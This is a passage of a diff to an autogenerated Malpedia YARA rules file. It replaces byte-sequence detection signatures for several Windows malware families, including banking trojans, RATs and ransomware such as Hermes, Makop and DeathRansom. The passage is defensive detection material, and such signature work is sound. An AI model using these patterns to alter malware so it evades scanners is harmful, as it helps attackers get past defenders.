+		$sequence_8 = { e8???????? eb38 488b7c2428 488b07 488b5f08 488b4f10 440f117f08 }
+		$sequence_9 = { c744242c4e67d48a 48ba22266cf93b139a0b 4889542418 c74424206ecc42ee 31c0 eb1a 0fb6540424 }
 
 	condition:
-		7 of them and filesize < 540672
+		7 of them and filesize < 39452672
 }
-rule MALPEDIA_Win_Montysthree_Auto : FILE
+rule MALPEDIA_Win_Darkloader_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "87f022dd-6806-53c4-b097-b12b0a06ec92"
+		id = "ad9df5bd-cb17-5a57-841e-d7169dd29ac7"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.montysthree"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.montysthree_auto.yar#L1-L127"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkloader"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.darkloader_auto.yar#L1-L120"
 		license_url = "N/A"
-		logic_hash = "49338e71bc632a417705dbca9be5623cbd05fe63eacf0615bb9fcdc5a3ff20f5"
+		logic_hash = "0e3b5f14c9565dba5f89e209f471d5ea4bec46d1f1cc2d6a50fe986d74ec01f7"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -112858,77 +112866,71 @@ rule MALPEDIA_Win_Montysthree_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 3c09 7443 3c0d 743f 3c20 743b }
-		$sequence_1 = { 5f 85f6 5e 0f94c0 5b c9 }
-		$sequence_2 = { 8d4d08 e8???????? ff30 6a6d ebac 66395f04 7629 }
-		$sequence_3 = { c745f010000000 ff15???????? 85c0 8b35???????? 756e ffd6 3d16000980 }
-		$sequence_4 = { 83ec18 68???????? e8???????? 59 8d4de8 e8???????? }
-		$sequence_5 = { 68???????? e8???????? 33f6 8975fc 3935???????? 0f850a010000 56 }
-		$sequence_6 = { 397dc8 7427 837dc802 7421 68???????? }
-		$sequence_7 = { 56 57 ff7510 33ff ff750c 33f6 }
-		$sequence_8 = { 885d77 f6456c02 7408 8d4d3c e8???????? 385d77 }
-		$sequence_9 = { 8d4ddc 895dfc e8???????? 395d08 742c 53 8d45fc }
+		$sequence_0 = { 8365fc00 ff15???????? 59 85c0 b9???????? }
+		$sequence_1 = { 68???????? ffb7dc010000 8987d4010000 ffd6 }
+		$sequence_2 = { 83f9ff 75bb 8bb42424020000 8dbe10a10010 ff742418 e8???????? 59 }
+		$sequence_3 = { 8931 e8???????? 83c410 33c0 40 ebaf 83ec18 }
+		$sequence_4 = { 8b01 ff90d0000000 83f809 7555 }
+		$sequence_5 = { 68???????? eb38 8d042f 50 e8???????? }
+		$sequence_6 = { 56 57 e8???????? 8bd8 59 59 85ff }
+		$sequence_7 = { ffb7dc010000 894704 ffd6 68???????? }
+		$sequence_8 = { 6a08 8bf8 be???????? 59 8d442414 f3a5 }
+		$sequence_9 = { a3???????? 5e c3 55 8bec 81ec04040000 33c9 }
 
 	condition:
-		7 of them and filesize < 458752
+		7 of them and filesize < 124928
 }
-rule MALPEDIA_Win_Tflower_Auto : FILE
+rule MALPEDIA_Win_Hermes_Ransom_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "c8b749a8-7605-5cc7-b1f5-9714e975ddf7"
-		date = "2026-01-05"
-		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tflower"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.tflower_auto.yar#L1-L157"
+		id = "88136c82-87ab-5f89-8963-9afb9534a540"
+		date = "2021-10-07"
+		modified = "2021-10-08"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hermes_ransom"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.hermes_ransom_auto.yar#L1-L125"
 		license_url = "N/A"
-		logic_hash = "b74bf6ff044f2b1de7c6b08182f1378f15e5cf0c006209455268705fb05e00e4"
+		logic_hash = "2bb9637b7e3ee9fcdd4e957eade001e8c8132e1b7c987ea6727ab44eda025915"
 		score = 75
 		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
 		signator_config = "callsandjumps;datarefs;binvalue"
-		malpedia_rule_date = "20260105"
-		malpedia_hash = "19b79e7cab4eaf532122e5b45a77dd8f6bb5cc79"
-		malpedia_version = "20251219"
+		malpedia_rule_date = "20211007"
+		malpedia_hash = "e5b790e0f888f252d49063a1251ca60ec2832535"
+		malpedia_version = "20211008"
 		malpedia_license = "CC BY-SA 4.0"
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 0001 0200 0103 0303 }
-		$sequence_1 = { 000f 7708 0001 7708 }
-		$sequence_2 = { 0002 7408 00f7 7308 }
-		$sequence_3 = { 89442414 8b06 83f804 0f8728010000 ff2485249d4a00 6a02 6a01 }
-		$sequence_4 = { 001a 0c05 003c0c 05004e0c05 }
-		$sequence_5 = { 8b148dc0064f00 331485c0024f00 8bc3 c1e808 }
-		$sequence_6 = { 83fa07 8b542410 775e 8b6c2414 ff24ad9ce34600 0fb679ff }
-		$sequence_7 = { 000b 8605???????? 007885 0500788605 }
-		$sequence_8 = { 33148520c54e00 33f2 2bde d3c3 8bc3 }
-		$sequence_9 = { 0010 740b 0021 740b }
-		$sequence_10 = { c745e0787f4b00 e9???????? c745e0647f4b00 e9???????? c745dc02000000 }
-		$sequence_11 = { 0001 7708 00f3 7608 }
-		$sequence_12 = { 0008 7408 0002 7408 }
-		$sequence_13 = { c1e818 8b4d2c c1eb10 03148520c14e00 0fb6c3 8b5d28 }
-		$sequence_14 = { 0fb6c0 8b0c8d20ed4e00 330c8520f14e00 8bc3 c1e818 c1eb10 }
-		$sequence_15 = { 0fbec0 8d89f8feffff 8d0c48 3b0c95788f4f00 }
+		$sequence_0 = { 59 59 8945e0 837ddc00 7506 837de000 7405 }
+		$sequence_1 = { 8d45dc 50 ff75d8 8d8560ffffff 50 ff75e0 ff15???????? }
+		$sequence_2 = { 33c0 668945e2 33c0 8945e4 8945e8 837df020 }
+		$sequence_3 = { 6a00 8d85a4f9ffff 50 ff15???????? 5f 5e 8be5 }
+		$sequence_4 = { 0fb7844504f7ffff 83f83b 741f 8b45d8 8b4df0 668b8c4d04f7ffff }
+		$sequence_5 = { 8365c800 8365d000 c745b840420f00 8365e000 eb07 8b45e0 40 }
+		$sequence_6 = { 59 6bc900 668981e8c34000 6a02 }
+		$sequence_7 = { 59 59 6a0f 6a00 8d45bc 50 }
+		$sequence_8 = { 8365f000 8b45f0 8945f8 837df800 7456 }
+		$sequence_9 = { 83e002 7415 ff750c ff75fc e8???????? 59 }
 
 	condition:
-		7 of them and filesize < 6578176
+		7 of them and filesize < 7192576
 }
-rule MALPEDIA_Win_Locky_Decryptor_Auto : FILE
+rule MALPEDIA_Win_Strifewater_Rat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "91dde92f-87a2-5234-b407-3d3ed8c90b2f"
+		id = "62a3ce73-baac-56a1-82cb-c062e0eed183"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.locky_decryptor"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.locky_decryptor_auto.yar#L1-L125"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.strifewater_rat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.strifewater_rat_auto.yar#L1-L131"
 		license_url = "N/A"
-		logic_hash = "adead49efcae5adc3a8d7fcf047561cadce25b6fc8d50f573c5cccce259fe79f"
+		logic_hash = "04a48ee28febde8895539bb526c6ef5f904eb84967ebbad205245d5d96a955aa"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -112942,34 +112944,34 @@ rule MALPEDIA_Win_Locky_Decryptor_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 03049500c14100 eb05 b8???????? f6400420 }
-		$sequence_1 = { 7202 8b1b 837dec08 8b4dd8 7303 8d4dd8 03c0 }
-		$sequence_2 = { 395ddc 7413 837de008 8b45cc 7303 }
-		$sequence_3 = { 8bf7 83e61f c1e606 03348500c14100 }
-		$sequence_4 = { 8b4dfa 33c0 4a 49 668945e8 668945ea 6a27 }
-		$sequence_5 = { 50 33c9 8d7d08 8975f0 e8???????? 83cbff }
-		$sequence_6 = { 6830010000 e8???????? 33db 59 59 3bc3 7509 }
-		$sequence_7 = { e8???????? 8b5e04 8b0e 8bc3 2bc1 99 f7ff }
-		$sequence_8 = { 8b45ec 8b08 890b 8938 397df0 740a 57 }
-		$sequence_9 = { e8???????? 6a01 33ff 8d75d8 e8???????? 8b450c 8b4df4 }
+		$sequence_0 = { 488b7c2478 4883c450 415e c3 488d151f910400 488d4c2420 e8???????? }
+		$sequence_1 = { 48895320 488d3d472d0800 be05000000 498bd5 8bce }
+		$sequence_2 = { 488b07 48634804 4803cf 85f6 741a 8b5110 0bd6 }
+		$sequence_3 = { 90 498b06 488b5858 488bcb e8???????? 4c8d4def 4c8d056e710500 }
+		$sequence_4 = { 48c7442420feffffff 48895c2440 488bf9 488d056ae70800 488901 4883c140 4533c0 }
+		$sequence_5 = { e9???????? 488b9540070000 4c8d0526ae0100 498bce e8???????? 85c0 }
+		$sequence_6 = { 488d0595ec0500 488906 eb02 33f6 4c8b05???????? 4d85c0 753c }
+		$sequence_7 = { 48634804 83640c48fb 4533ff eb0d 408ad7 488d4c2430 e8???????? }
+		$sequence_8 = { 48898424f0000000 488b4e08 4885c9 7509 488d1598330900 eb0d 488b5128 }
+		$sequence_9 = { 8bc3 874710 85c0 7421 8365d800 488d059ca1feff 488945e0 }
 
 	condition:
-		7 of them and filesize < 278528
+		7 of them and filesize < 1552384
 }
-rule MALPEDIA_Win_Artra_Auto : FILE
+rule MALPEDIA_Win_Ondritols_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "5ecf739d-5644-589e-9019-73f6778eda0f"
+		id = "81710fe6-9ae7-546c-9cb9-b9c86df2ce65"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.artra"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.artra_auto.yar#L1-L273"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ondritols"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.ondritols_auto.yar#L1-L131"
 		license_url = "N/A"
-		logic_hash = "47a80b3adb8b5b5a6473fc70d14da7afeb3a861c9b53c6c23d484145a04e805d"
+		logic_hash = "44ff18d30e7336ef39e54fec8b0b622a69d795c9c1893d07882cb3b4d93aa6f9"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -112981,48 +112983,32 @@ rule MALPEDIA_Win_Artra_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 75cc 5d 5b 8b442410 5f 5e 83c41c }
-		$sequence_1 = { 5f 8a08 40 84c9 75f9 2bc2 880c30 }
-		$sequence_2 = { 5f 5e 83c41c c21000 5f 33c0 }
-		$sequence_3 = { 57 33c9 8d7801 8da42400000000 8a10 40 84d2 }
-		$sequence_4 = { 2bc7 3bc8 72e3 8bc6 8d5001 5f }
-		$sequence_5 = { 800431f3 8bc6 41 8d7801 8d9b00000000 }
-		$sequence_6 = { e8???????? 8b3d???????? 6a00 6a00 6a00 8d442414 }
-		$sequence_7 = { ff15???????? 8bf8 85ff 0f8488000000 6a00 57 ff15???????? }
-		$sequence_8 = { 8d8c2420010000 51 8d542418 52 8d442420 50 }
-		$sequence_9 = { 2bc2 03fb 8a4f01 47 }
-		$sequence_10 = { 40 42 84c9 75f6 e8???????? }
-		$sequence_11 = { 8bf0 8bd1 83c404 2bf2 90 8a11 88140e }
-		$sequence_12 = { 90 8b542410 8d4c2410 51 56 52 ffd3 }
-		$sequence_13 = { 53 8b1d???????? 55 8b2d???????? 90 }
-		$sequence_14 = { e8???????? 8d442458 83c410 8bc8 }
-		$sequence_15 = { 6a00 8d54241c 52 ffd7 85c0 75cc 5d }
-		$sequence_16 = { 6a00 8d442414 50 ffd7 85c0 7445 }
-		$sequence_17 = { 7205 e8???????? 8b7c2414 8b4f3c 8b11 8b5214 8d44241c }
-		$sequence_18 = { 2c61 3c05 7733 885c2c18 45 83fd02 7529 }
-		$sequence_19 = { 8810 40 83ee01 75f3 b8???????? c6042f00 8d5001 }
-		$sequence_20 = { c1f805 8bcf 83e11f c1e106 8b0485e03b4100 c644080401 57 }
-		$sequence_21 = { c21000 a1???????? 6a00 68???????? 56 6a67 50 }
-		$sequence_22 = { 6a6d 56 ff15???????? be???????? 8bf8 e8???????? }
-		$sequence_23 = { c744241430124000 c744241800000000 c744241c00000000 89442420 ffd6 68007f0000 6a00 }
-		$sequence_24 = { 8b2d???????? 8b442410 8d542410 52 57 50 ffd3 }
-		$sequence_25 = { 8b542428 50 68???????? 6a01 }
+		$sequence_0 = { f3ab 59 894df8 8b4df8 e8???????? 50 8b45f8 }
+		$sequence_1 = { c745fcffffffff 8d4d10 e8???????? 8a8523ffffff eb1e eb9c c6852fffffff01 }
+		$sequence_2 = { c745fc00000000 8b4508 c1f805 8b4d08 83e11f c1e106 8b1485e0ca4600 }
+		$sequence_3 = { 50 8d45f4 64a300000000 894dec 6a01 8d8518ffffff }
+		$sequence_4 = { 7409 8b55e4 c70201000000 eb15 c745e400000000 c745f000000000 c745e848a54600 }
+		$sequence_5 = { 895f14 895f18 39b530ffffff 720f 8b951cffffff 52 e8???????? }
+		$sequence_6 = { e8???????? 8b45e4 50 e8???????? 83c408 885dfc 8d7310 }
+		$sequence_7 = { 746a 833d????????10 720e a1???????? 50 e8???????? 83c404 }
+		$sequence_8 = { c645fc04 e8???????? 83c404 3bc3 0f84a7020000 8906 }
+		$sequence_9 = { 8d8568f5ffff 50 e8???????? 83c404 83c00b 83f83c }
 
 	condition:
-		7 of them and filesize < 811008
+		7 of them and filesize < 964608
 }
-rule MALPEDIA_Win_Pandabanker_Auto : FILE
+rule MALPEDIA_Win_Treasurehunter_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "d7a6bb16-47e5-52e8-857d-352f3fc1d921"
+		id = "e821ddca-c116-541d-9bd5-f7649288cdd5"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pandabanker"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.pandabanker_auto.yar#L1-L119"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.treasurehunter"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.treasurehunter_auto.yar#L1-L106"
 		license_url = "N/A"
-		logic_hash = "7224c438b16af79be738a189a249337e2e081d636ca75e4e1c5b1122ffa5e8c5"
+		logic_hash = "102e6e7f9d869ce1a995b96c3cd12e8dc18894c29a700642a08bd98f281dfbdd"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -113036,32 +113022,30 @@ rule MALPEDIA_Win_Pandabanker_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { d0c2 8ac2 d0c0 32c1 32c2 }
-		$sequence_1 = { 42 83fa10 72ee 8b5500 }
-		$sequence_2 = { 8bf2 57 8bf9 8d8df4fdffff }
-		$sequence_3 = { f3aa 8932 8d46f0 8b5500 }
-		$sequence_4 = { 895c2414 8bf1 e8???????? 84c0 746d 83caff 8bce }
-		$sequence_5 = { 8bf0 85f6 7414 e8???????? 8906 85c0 7509 }
-		$sequence_6 = { 33c0 33d2 89442418 3bfd 7359 }
-		$sequence_7 = { 8bce 2b0f 33448f4c 8944b74c 6a05 59 }
-		$sequence_8 = { 03c8 894c2434 8d5101 8bce e8???????? 85c0 }
-		$sequence_9 = { 75f9 2bce 5e 8d040a c3 33c0 c3 }
+		$sequence_0 = { 53 56 57 6a01 6a00 e8???????? }
+		$sequence_1 = { 6800000020 6a2f 68???????? 57 ff15???????? 85c0 }
+		$sequence_2 = { 8a0e 46 84c9 75f9 2bf0 e8???????? }
+		$sequence_3 = { 56 57 8bf9 8bca e8???????? 8b7508 }
+		$sequence_4 = { 53 56 8b35???????? 8bd9 8b4d08 57 8955fc }
+		$sequence_5 = { 8bf1 85d2 7e0b 4a e8???????? 0fafc6 5e }
+		$sequence_6 = { 8903 ff15???????? 8b4dfc 57 }
+		$sequence_7 = { 6800040000 8d85fcfbffff 50 8d85fcf7ffff 50 e8???????? }
 
 	condition:
-		7 of them and filesize < 417792
+		7 of them and filesize < 229376
 }
-rule MALPEDIA_Win_Waterspout_Auto : FILE
+rule MALPEDIA_Win_Makop_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "b586bd54-931a-56de-aa91-0c07bfde94ab"
+		id = "e214999d-16a1-514d-bedc-c66a8b25498d"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.waterspout"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.waterspout_auto.yar#L1-L127"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.makop"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.makop_auto.yar#L1-L130"
 		license_url = "N/A"
-		logic_hash = "d8e2787076e89338cd714382e58eddd7d135aa9f7451f2a43ebcaaaa612febc9"
+		logic_hash = "fab88e1b8315d53c8f1d019ae0fd200eb0984fdd471585289f6762a4445cd571"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -113075,32 +113059,32 @@ rule MALPEDIA_Win_Waterspout_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 68???????? 56 e8???????? 83c418 84c0 751e 6a01 }
-		$sequence_1 = { 56 8d4c2420 8802 ff15???????? bf???????? 83c9ff }
-		$sequence_2 = { 88442424 32c3 50 e8???????? 8a4c2420 8ad3 32d1 }
-		$sequence_3 = { 83fe01 f3aa 8a842470200000 884500 }
-		$sequence_4 = { 57 57 50 ff15???????? 85c0 7540 8b0e }
-		$sequence_5 = { 83c408 8d4c2414 c744241430750000 6a04 51 }
-		$sequence_6 = { c68424870000008f c684248800000092 c68424890000009d c684248a00000038 c684248b000000f5 c684248c000000bc c684248d000000b6 }
-		$sequence_7 = { 8bb4240c200000 8d442410 6a00 50 6a00 6a00 6a00 }
-		$sequence_8 = { 8dbc24ac030000 f3ab 8d442410 8d4c2418 50 8b842490630000 51 }
-		$sequence_9 = { 33ff 3bdf 897d00 7403 53 ffd6 }
+		$sequence_0 = { 5e 5b 83c41c c3 ffd7 50 e8???????? }
+		$sequence_1 = { 8bc6 e8???????? 894630 8b4500 8903 8b0f }
+		$sequence_2 = { 894118 8b0e c6412800 e8???????? }
+		$sequence_3 = { ff15???????? 8bf0 83feff 744f 8bc7 8a08 83c001 }
+		$sequence_4 = { 8d04b8 7414 8b00 50 6a00 ffd5 50 }
+		$sequence_5 = { 833e00 8b35???????? c744240c00000000 7645 8b5c2410 8da42400000000 8b0b }
+		$sequence_6 = { 53 a3???????? ff15???????? 50 ff15???????? 8d742418 e8???????? }
+		$sequence_7 = { 56 e8???????? 8d4e28 51 6a0a 8bc6 e8???????? }
+		$sequence_8 = { c3 ffd7 50 e8???????? 83c404 5f 5e }
+		$sequence_9 = { 6a00 8d4c2414 51 52 57 55 c744242800000000 }
 
 	condition:
-		7 of them and filesize < 98304
+		7 of them and filesize < 107520
 }
-rule MALPEDIA_Win_Concealment_Troy_Auto : FILE
+rule MALPEDIA_Win_Darkme_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "85d5c577-b8ec-58e5-9740-0a0ca10b0ae9"
+		id = "1036dced-69e3-5dff-8a15-6ed9a4e7c833"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.concealment_troy"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.concealment_troy_auto.yar#L1-L123"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkme"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.darkme_auto.yar#L1-L133"
 		license_url = "N/A"
-		logic_hash = "b00daac439b94b56b64f9d02955d44b706d6186abc3a4c26b1bfb61dd4d222d0"
+		logic_hash = "816ab6c03be8b7c8209c8913616f17d58c6b5480cc780d2ab0b0d2412d8ca815"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -113114,32 +113098,32 @@ rule MALPEDIA_Win_Concealment_Troy_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c744244000000000 ff15???????? 85c0 0f844cffffff 8b542424 }
-		$sequence_1 = { 7530 8b54240c 52 ff15???????? 53 }
-		$sequence_2 = { 8bc8 83e103 f3a4 8d542418 8d8c2430090000 e8???????? 85c0 }
-		$sequence_3 = { 3acb 75f6 6804010000 8d8c2424010000 53 }
-		$sequence_4 = { f3a5 66a5 83c40c a4 8d4c2418 8d642400 8a01 }
-		$sequence_5 = { 85c0 0f8476ffffff 6a00 6a08 6a00 }
-		$sequence_6 = { e8???????? 83c414 ebd0 8bc8 c1f905 8d3c8da0774100 }
-		$sequence_7 = { 8d8c2470050000 68???????? 51 e8???????? 8d842478050000 83c418 8d5001 }
-		$sequence_8 = { b87c130000 e8???????? a1???????? 33c4 89842478130000 53 }
-		$sequence_9 = { 52 889c242c010000 e8???????? 6807020000 8d842441090000 53 }
+		$sequence_0 = { 40 f7d8 668985f0feffff 8d4d84 ff15???????? 8d8d70ffffff ff15???????? }
+		$sequence_1 = { eb12 8b95ecfeffff 81c2???????? 8995a8feffff 8b85a8feffff 8b08 8b95a8feffff }
+		$sequence_2 = { 8d4ddc 898d90feffff 8b9590feffff 8b02 8985e4feffff 6a00 8b4dc8 }
+		$sequence_3 = { 8b8504ffffff 8b08 8b01 52 ff9098030000 50 }
+		$sequence_4 = { c745f8???????? c745fc00000000 8b7508 8b06 56 ff5004 668b4d0c }
+		$sequence_5 = { 7459 c745fc08000000 6a10 8b55cc 52 8d45d0 50 }
+		$sequence_6 = { c745b801000000 c745b002000000 8b55d4 52 8d45b0 50 d9856cffffff }
+		$sequence_7 = { 898d24ffffff eb12 8b9530ffffff 81c2???????? 899524ffffff 8b8524ffffff 8b08 }
+		$sequence_8 = { 8b1491 52 68???????? e8???????? 8bd0 8d4dac ff15???????? }
+		$sequence_9 = { 6a00 6a00 6a01 6a08 8b9530ffffff 81c2???????? 52 }
 
 	condition:
-		7 of them and filesize < 229376
+		7 of them and filesize < 1515520
 }
-rule MALPEDIA_Win_Ehdevel_Auto : FILE
+rule MALPEDIA_Win_Typehash_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "a1927287-a7a0-56db-9215-479d35c403c1"
+		id = "0c0bfd3b-1920-5db4-be8f-16377880af07"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ehdevel"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.ehdevel_auto.yar#L1-L130"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.typehash"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.typehash_auto.yar#L1-L122"
 		license_url = "N/A"
-		logic_hash = "684d7241cee866804960efb3b0b6928989858b77ba794c784761214d04fdf763"
+		logic_hash = "cb4de3d61dde4ee402264a80e34744365587a3be274cf88c25ae82f2b1a1af55"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -113153,32 +113137,32 @@ rule MALPEDIA_Win_Ehdevel_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 33c5 8945fc 57 8bf9 8d85ece7ffff 50 8d8dfcf7ffff }
-		$sequence_1 = { 85c0 7524 a1???????? a3???????? a1???????? c705????????d22f0110 8935???????? }
-		$sequence_2 = { 51 e8???????? 83c40c 56 8d95e8fbffff 6804010000 }
-		$sequence_3 = { 8b3d???????? c60301 ffd7 56 ff15???????? 56 ffd7 }
-		$sequence_4 = { 8985e8f7ffff 897e10 897e14 c645fc03 399d94f7ffff 720f 8b8d80f7ffff }
-		$sequence_5 = { 8d8dfcf7ffff 51 e8???????? 83c410 84c0 7502 32db }
-		$sequence_6 = { 8b8dd48bffff 6a00 6880000000 6a04 6a00 6a00 6a04 }
-		$sequence_7 = { eb19 8b4c2414 8b4904 8b440c4c 8d4c0c14 f7d8 }
-		$sequence_8 = { 33d2 8955fc 3bca 7458 33f6 52 c7411407000000 }
-		$sequence_9 = { c745f463006f00 c745f86d000000 e8???????? 3c01 7441 }
+		$sequence_0 = { 0f8380000000 8bc8 8bf0 c1f905 83e61f 8d3c8de03d4100 c1e603 }
+		$sequence_1 = { 8d7c246c 83c9ff 33c0 8d54246c f2ae f7d1 }
+		$sequence_2 = { 8b0c8de03d4100 8d04c1 eb05 b8???????? f6400480 0f8492000000 ff4e04 }
+		$sequence_3 = { 8b15???????? 8d4c2410 52 6800280000 }
+		$sequence_4 = { 50 c745c458e64000 e8???????? cc 56 ff742408 8bf1 }
+		$sequence_5 = { 5f eb26 8d4508 8db6742a4100 6a00 50 }
+		$sequence_6 = { c1f905 83e01f 8b0c8de03d4100 8d04c1 }
+		$sequence_7 = { 3bd7 770f e8???????? 8b442418 8b0d???????? 3bfb }
+		$sequence_8 = { 8d4c2440 c68424cc00000001 e8???????? 8b44241c 3d00280000 7312 }
+		$sequence_9 = { 03f8 897c2410 813f50450000 7413 68c1000000 }
 
 	condition:
-		7 of them and filesize < 524288
+		7 of them and filesize < 180224
 }
-rule MALPEDIA_Win_Bundestrojaner_Auto : FILE
+rule MALPEDIA_Win_Deathransom_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "47ea5615-8136-5cb4-9bef-7286571c39f9"
+		id = "50ee2015-88b7-58a2-ad62-287a84416fd8"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bundestrojaner"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.bundestrojaner_auto.yar#L1-L131"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.deathransom"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.deathransom_auto.yar#L1-L132"
 		license_url = "N/A"
-		logic_hash = "fd1e7fa09fb34d70736eb8553b933219d912c7ea6e3c9d3818f4d8762292bdc7"
+		logic_hash = "4fbf584c560c10f65d1ed9a5619731c7c654805433383d8df8efbda5a45512a6"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -113192,34 +113176,34 @@ rule MALPEDIA_Win_Bundestrojaner_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 85c0 7e15 8bc5 2bdd d90403 d800 41 }
-		$sequence_1 = { 3bca 7e5a 8b4e10 85c9 7443 c1f803 8d542801 }
-		$sequence_2 = { 33d5 89a8c4000000 33f2 89542418 8990c8000000 8bd6 }
-		$sequence_3 = { 895610 89560c 895614 7415 8b44240c 3bc2 740d }
-		$sequence_4 = { 8b7e1b 8ac8 80e902 f6d9 1bc9 2c02 83e102 }
-		$sequence_5 = { 740f 6a00 6a00 6a27 8bc8 e8???????? eb02 }
-		$sequence_6 = { 8b44243c c68424c800000002 8b4830 51 8bce e8???????? }
-		$sequence_7 = { 8bcf 8b442418 8d1476 896c2460 f7d9 8bac2430010000 83e103 }
-		$sequence_8 = { 50 8986b4000000 e8???????? 83c420 b802000000 89bec0000000 89bec4000000 }
-		$sequence_9 = { 50 e8???????? 8b4c2410 8b542408 51 50 }
+		$sequence_0 = { 668945d8 8d55d8 8b45f4 52 6a00 68???????? 8b08 }
